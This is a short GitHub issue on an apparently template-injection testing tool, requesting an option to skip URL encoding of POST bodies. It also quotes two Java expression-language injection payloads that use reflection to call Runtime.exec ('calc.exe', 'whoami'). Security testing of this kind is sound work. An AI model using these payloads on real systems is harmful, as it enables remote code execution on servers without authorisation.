Toggle enable/disable url encoding on POST body web request #22
Labels
awaits confirmation
The issue is supposed to be resolved, but requires some testing
delayed
The issue will be fixed with a big update later
enhancement
New feature or request
template engine
A template engine to add
Hi! Your tool is awesome. I was playing along with it and it is very good on GET web request. And i think it will be pretty awesome to have an option of not URL encoding the POST web request.
URL encoded
URl decoded
This one here is out of topic but does this tool also support expression language like on swisskyrepo's SSTI EL code execution?
// Method using Reflection & Invoke
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}
@
The text was updated successfully, but these errors were encountered: